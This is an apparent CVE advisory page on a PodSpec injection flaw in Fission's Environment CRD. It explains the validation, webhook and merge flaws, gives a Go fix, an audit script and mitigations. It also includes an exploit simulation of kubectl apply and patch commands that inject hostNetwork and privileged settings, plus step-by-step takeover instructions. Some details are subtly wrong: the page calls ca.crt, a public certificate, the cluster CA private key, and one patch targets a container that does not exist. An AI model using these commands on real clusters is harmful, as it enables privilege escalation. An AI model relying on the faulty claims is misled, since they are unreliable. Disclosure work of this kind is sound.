Fission Environment CRD PodSpec Injection, CVE-2026-50545 (CRITICAL) -DC-Jun2026-753


How the CVE Works

Prior to Fission v1.24.0, the Environment Custom Resource Definition (CRD) exposed two passthrough fields, `spec.runtime.podSpec` and `spec.builder.podSpec`, which allowed users to supply arbitrary Kubernetes PodSpec configuration. This mechanism was intended to provide flexibility but lacked proper security validation, creating a critical attack vector.

The vulnerability stems from three compounding flaws:

  1. Validation Gap – The `Environment.Validate` function in `pkg/apis/core/v1/validation.go` only checked container naming conventions. It never validated dangerous pod-level fields such as `hostPID`, `hostIPC`, `hostNetwork`, `hostPath` volumes, or `privileged` containers. No security-relevant checks were performed on user-supplied PodSpec fields.
  2. UPDATE Bypass – The Kubernetes admission webhook in `pkg/webhook/environment.go` was registered with `verbs=create` only. A tenant could apply a clean Environment using `kubectl apply`, then issue a follow-up `kubectl patch` to inject dangerous fields; the webhook was never invoked for update operations, completely bypassing admission control.
  3. Merge Propagation – The `MergePodSpec` function in `pkg/executor/util/merge.go` unconditionally forwarded `HostPID`, `HostIPC`, `HostNetwork`, `Volumes` (including `hostPath`), `SecurityContext`, and `ServiceAccountName` into the Deployments generated by poolmgr, newdeploy, and buildermgr. No filtering or sanitization was applied at the merge layer.

A simple `kubectl apply` plus a follow-up `kubectl patch` caused poolmgr to schedule a privileged pod with a host-root mount within roughly 20 seconds. From that pod, the cluster CA private key was readable, allowing the attacker to sign arbitrary kubelet certificates and achieve full cluster takeover.

The vulnerability affects all Fission installations prior to version 1.24.0 and carries a CVSS score of 9.9 (CRITICAL).

DailyCVE Form:

| Field | Value |
|-|-|
| Platform | Fission |
| Version | < 1.24.0 |
| Vulnerability | PodSpec Injection |
| Severity | CRITICAL (9.9) |
| Date | 2026-06-10 |
| Prediction | Already Patched v1.24.0 |

What Undercode Say:

```bash
# Check current Fission version
kubectl get deployment -n fission fission-controller -o jsonpath='{.spec.template.spec.containers[0].image}'

# Verify Environment CRD allows podSpec passthrough
kubectl get crd environments.fission.io -o yaml | grep -A5 "podSpec"

# Exploit simulation: create clean Environment then patch dangerous fields
cat <<EOF | kubectl apply -f -
apiVersion: fission.io/v1
kind: Environment
metadata:
  name: vulnerable-env
  namespace: default
spec:
  runtime:
    image: python:3.9
    podSpec: {}
EOF

# Patch in hostNetwork + privileged container (webhook bypassed on UPDATE)
kubectl patch environment vulnerable-env --type='json' -p='[{"op": "add", "path": "/spec/runtime/podSpec/hostNetwork", "value": true}]'
kubectl patch environment vulnerable-env --type='json' -p='[{"op": "add", "path": "/spec/runtime/podSpec/containers/0/securityContext/privileged", "value": true}]'

# Result: poolmgr schedules privileged pod with hostNetwork within ~20s
kubectl get pods -n default -l environment=vulnerable-env

# From the compromised pod, read cluster CA key
kubectl exec -it <pod-name> -n default -- cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
```

Code Fix (from 3391):

```go
// pkg/apis/core/v1/podspec_safety.go - ValidatePodSpecSafety()
package v1

import (
	"fmt"

	corev1 "k8s.io/api/core/v1"
)

// ValidatePodSpecSafety rejects the pod-level fields the pre-1.24.0 validator
// never looked at: host namespaces, hostPath volumes, privileged or
// escalating containers, and non-default service accounts.
func ValidatePodSpecSafety(podSpec corev1.PodSpec) error {
	if podSpec.HostNetwork || podSpec.HostPID || podSpec.HostIPC {
		return fmt.Errorf("host namespaces are not allowed")
	}
	for _, vol := range podSpec.Volumes {
		if vol.HostPath != nil {
			return fmt.Errorf("hostPath volumes are not allowed")
		}
	}
	for _, c := range podSpec.Containers {
		if c.SecurityContext != nil {
			// Privileged and AllowPrivilegeEscalation are *bool: check for nil, then dereference.
			if c.SecurityContext.Privileged != nil && *c.SecurityContext.Privileged {
				return fmt.Errorf("privileged containers are not allowed")
			}
			if c.SecurityContext.AllowPrivilegeEscalation != nil && *c.SecurityContext.AllowPrivilegeEscalation {
				return fmt.Errorf("allowPrivilegeEscalation is not allowed")
			}
		}
		// Dangerous capabilities blocklist
	}
	if podSpec.ServiceAccountName != "" && podSpec.ServiceAccountName != "default" {
		return fmt.Errorf("custom ServiceAccountName is not allowed")
	}
	return nil
}
```

Exploit:

An authenticated user with `environments.fission.io` create/update RBAC permissions can:

1. Create a benign Environment with an empty `podSpec`
2. Issue a `kubectl patch` to inject `hostNetwork: true`, `hostPID: true`, or `securityContext.privileged: true`
3. The UPDATE webhook is never called (`verbs=create` only), allowing the patch to succeed
4. `MergePodSpec` propagates all dangerous fields into the generated Deployment
5. poolmgr schedules a privileged pod with host namespace access within ~20 seconds
6. From the pod, read `/var/run/secrets/kubernetes.io/serviceaccount/ca.crt` to obtain the cluster CA
7. Sign arbitrary kubelet certificates and achieve full cluster takeover

Attack Vector: Network, Privileges Required: Low, User Interaction: None

Protection:

  • Upgrade to Fission v1.24.0 or later immediately
  • If upgrade is not possible, restrict `environments.fission.io` create/update permissions to trusted administrators only
  • Deploy admission controllers or OPA policies that reject PodSpec fields with `hostNetwork`, `hostPID`, `hostIPC`, `hostPath`, or `privileged: true`
  • Implement network policies to limit pod communication
  • Audit existing Environment configurations for suspicious `podSpec` entries introduced before patching
  • Monitor for unauthorized modifications to Environment CRDs
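The audit step above, as an added operator-side script that is not Fission's code and not part of the advisory: it applies the same blocklist as the v1.24.0 fix to every Environment in the output of `kubectl get environments.fission.io -A -o json`, checking both `spec.runtime.podSpec` and `spec.builder.podSpec`, and going slightly beyond the advisory by also covering `initContainers`. The Environment list it falls back to when nothing is piped in is constructed here.

```python
import json
import sys

def unsafe_podspec_findings(pod_spec, where):
    """Findings for one passthrough podSpec (spec.runtime or spec.builder)."""
    pod_spec = pod_spec if isinstance(pod_spec, dict) else {}
    findings = []
    for key in ("hostNetwork", "hostPID", "hostIPC"):  # host namespaces
        if pod_spec.get(key) is True:
            findings.append(f"{where}.{key}=true")
    for vol in pod_spec.get("volumes") or []:  # hostPath volumes
        if isinstance(vol, dict) and "hostPath" in vol:
            findings.append(f"{where}.volumes[{vol.get('name', '?')}].hostPath")
    for field in ("containers", "initContainers"):  # privileged / escalating containers
        for idx, c in enumerate(pod_spec.get(field) or []):
            sc = (c or {}).get("securityContext") or {}
            for flag in ("privileged", "allowPrivilegeEscalation"):
                if sc.get(flag) is True:
                    findings.append(f"{where}.{field}[{idx}].securityContext.{flag}=true")
    sa = pod_spec.get("serviceAccountName")  # same rule as the fix: empty or "default" only
    if sa and sa != "default":
        findings.append(f"{where}.serviceAccountName={sa}")
    return findings

def audit_environments(env_list):
    """Map 'namespace/name' -> findings for every Environment carrying unsafe fields."""
    report = {}
    for item in env_list.get("items", []):
        meta = item.get("metadata") or {}
        key = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
        spec, findings = item.get("spec") or {}, []
        for section in ("runtime", "builder"):
            pod_spec = (spec.get(section) or {}).get("podSpec")
            findings += unsafe_podspec_findings(pod_spec, f"spec.{section}.podSpec")
        if findings:
            report[key] = findings
    return report

# Constructed sample: a clean Environment and one patched the way the advisory describes.
SAMPLE_LIST = {"items": [
    {"metadata": {"name": "clean-env", "namespace": "default"},
     "spec": {"runtime": {"image": "python:3.9", "podSpec": {}}}},
    {"metadata": {"name": "vulnerable-env", "namespace": "default"},
     "spec": {"runtime": {"image": "python:3.9", "podSpec": {
         "hostNetwork": True, "volumes": [{"name": "root", "hostPath": {"path": "/"}}],
         "containers": [{"name": "python", "securityContext": {"privileged": True}}]}}}}]}

if __name__ == "__main__":
    data = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_LIST
    print(json.dumps(audit_environments(data), indent=2))
```

Any entry in the report is a podSpec the fixed validator would reject; on a cluster patched after such an Environment was created, the already-running poolmgr pods built from it still need to be rotated.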

Impact:

  • Node escape via privileged container with host namespace access
  • Cluster CA private key exposure – readable from the compromised pod
  • Full cluster takeover – attacker can sign arbitrary kubelet certificates
  • Lateral movement within the Kubernetes environment
  • Data exfiltration and persistent access
  • CVSS 9.9 (CRITICAL) – Scope: Changed, Impact: High on all three pillars (Confidentiality, Integrity, Availability)

Sources:

Reported By: github.com